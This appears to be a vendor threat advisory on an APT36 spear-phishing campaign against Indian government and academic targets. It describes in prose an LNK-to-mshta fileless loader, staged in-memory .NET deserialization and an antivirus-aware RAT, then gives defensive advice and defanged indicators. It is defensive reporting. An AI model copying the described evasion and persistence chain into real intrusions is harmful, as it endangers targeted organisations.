Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
APT36, also known as Transparent Tribe, ProjectM, Mythic Leopard, TEMP.Lapis, Copper Fieldstone, Earth Karkaddan, STEPPY-KAVACH, Green Havildar, APT-C-56, Storm-0156, and Opaque Draco, continues its persistent cyber-espionage operations targeting Indian governmental and academic institutions. First observed on December 15, 2025, this latest APT36 campaign demonstrates how a single convincing click can quietly establish long-term espionage access through sophisticated fileless malware techniques.
The APT36 attack chain begins with carefully crafted spear-phishing emails delivering ZIP archives disguised as legitimate examination material targeting Indian government and academic personnel. Inside the APT36 malicious archive, victims encounter a deceptively named Windows shortcut file masquerading as a PDF document, exploiting Windows’ default behavior of hiding file extensions. This weaponized APT36 LNK shortcut embeds a full PDF structure to reinforce legitimacy while silently launching mshta.exe, a trusted Windows utility, to retrieve and execute attacker-controlled HTA content directly in memory.
The APT36 fileless infection unfolds through multiple sophisticated stages designed to evade traditional file-based security controls. The initial APT36 “ReadOnly” stage reconstructs a serialized .NET object in memory and deliberately weakens built-in deserialization safeguards, paving the way for the “WriteOnly” stage which loads a larger malicious DLL entirely in memory. Throughout the APT36 infection process, victims see a legitimate PDF document displayed on their screens, reinforcing the illusion of normal activity while the APT36 Remote Access Trojan quietly initializes in the background.
At the core of the APT36 operation is a fully featured Remote Access Trojan that profiles host environments, queries installed antivirus solutions via Windows Management Instrumentation, and dynamically adapts persistence mechanisms to evade detection by security software. The APT36 malware deploys tailored execution paths using startup shortcuts, batch files, registry modifications, or obfuscated HTA loaders depending on detected security software. APT36 command-and-control communication is encrypted, enabling remote command execution, file access, screen capture, clipboard manipulation, and extensive data theft from compromised Indian government systems without raising immediate security alarms.
APT36, operating under multiple aliases including Transparent Tribe, continues to demonstrate its unwavering focus on cyber-espionage operations targeting Indian governmental and strategic entities. This latest APT36 campaign reflects a deliberate and methodical approach by the threat actor, prioritizing stealth, persistence, and long-term intelligence collection over immediate disruption of target networks. By blending sophisticated social engineering with advanced technical capabilities, the APT36 threat actor leverages trusted Windows components and familiar document formats to infiltrate sensitive Indian government environments while minimizing suspicion and forensic visibility.
The APT36 attack chain begins with carefully crafted spear-phishing emails delivering ZIP archives disguised as legitimate examination material specifically tailored to Indian government and academic target audiences. Inside the APT36 malicious archive, victims encounter a deceptively named shortcut file masquerading as a PDF, exploiting Windows’ tendency to hide file extensions from users. Unlike typical shortcuts, this oversized APT36 LNK file embeds a full PDF structure internally, reinforcing its perceived legitimacy when victims inspect file properties.
When the APT36 weaponized shortcut is executed, it silently launches mshta.exe, a trusted Windows utility commonly used for legitimate HTML applications, to retrieve and execute attacker-controlled HTA content directly in memory. This APT36 technique effectively bypasses traditional file-based security controls that rely on scanning files written to disk, as the malicious HTA payload never persists in the filesystem during initial execution.
Once the APT36 HTA loader is active, the infection unfolds in multiple carefully orchestrated stages designed to prepare victim systems for deeper compromise. The initial APT36 “ReadOnly” stage reconstructs a serialized .NET object entirely in memory and deliberately weakens built-in .NET deserialization safeguards, opening the door for unsafe operations that would normally be blocked. This paves the way for the APT36 “WriteOnly” stage, which loads a larger malicious DLL entirely in memory without ever touching the disk.
Throughout this APT36 multi-stage infection process, the malware displays a legitimate PDF document to victims, carefully reinforcing the illusion of normal document-viewing activity while malicious APT36 components quietly initialize and establish persistence in the background without raising user suspicion.
At the core of the APT36 operation is a fully featured Remote Access Trojan that grants attackers covert, long-term control over infected Indian government systems. The APT36 malware profiles the host environment through comprehensive system reconnaissance, queries installed antivirus and security solutions via Windows Management Instrumentation, and dynamically adapts its persistence mechanisms based on detected security software to maximize evasion probability.
Depending on the specific security software present on compromised systems, the APT36 RAT deploys tailored execution paths using Windows startup shortcuts, batch files, registry Run key modifications, or obfuscated HTA loaders designed to survive system reboots while evading detection by endpoint security products. APT36 command-and-control communication is fully encrypted, enabling secure remote command execution, comprehensive file system access, real-time screen capture, clipboard data manipulation, and extensive data exfiltration capabilities without raising immediate security alarms.
This APT36 campaign highlights the threat actor’s continued evolution toward more resilient, security-aware intrusion frameworks specifically designed to compromise high-value Indian government targets. By abusing trusted Windows utilities like mshta.exe, embedding malicious logic within seemingly benign files, and maintaining a modular multi-stage execution model, the APT36 group effectively blends into normal user activity while sustaining persistent access for long-term intelligence collection operations.
Windows shortcut (LNK) files can execute hidden commands and launch malicious payloads, as demonstrated in the APT36 fileless campaign. Users should avoid opening unexpected shortcut files, even if they appear to be PDFs or legitimate documents. Organizations should implement user awareness training specifically highlighting APT36 social engineering tactics and the dangers of disguised LNK files in phishing campaigns targeting Indian government entities.
Monitor and restrict the use of mshta.exe, wscript.exe, and similar Windows utilities frequently abused by APT36 for fileless malware execution. Implement application control policies that prevent these utilities from launching unless specifically required for legitimate business purposes. Deploy behavioral monitoring specifically targeting APT36 tradecraft patterns including mshta.exe launching from unexpected parent processes or user-initiated actions.
Isolate sensitive Indian government systems from general user networks to limit APT36 lateral movement following initial compromise. Implement strict egress filtering to detect and block unauthorized command-and-control communication used by APT36 Remote Access Trojans. Deploy network monitoring specifically targeting encrypted communication patterns characteristic of APT36 C2 infrastructure.
Deploy next-generation antivirus and endpoint detection and response solutions specifically configured to identify and block APT36 fileless malware techniques. Leverage behavioral analysis and machine learning-based detection to identify suspicious activity patterns characteristic of APT36 multi-stage infections, including in-memory .NET object deserialization, DLL injection, and dynamic persistence mechanism deployment. Implement memory scanning capabilities to detect APT36 malware operating entirely in RAM without filesystem artifacts.
SHA256 Hashes:
Malicious Domains: innlive[.]in, drjagrutichavan[.]com
C2 IP Address: 2[.]56[.]10[.]86
Get through updates and upcoming events, and more directly in your inbox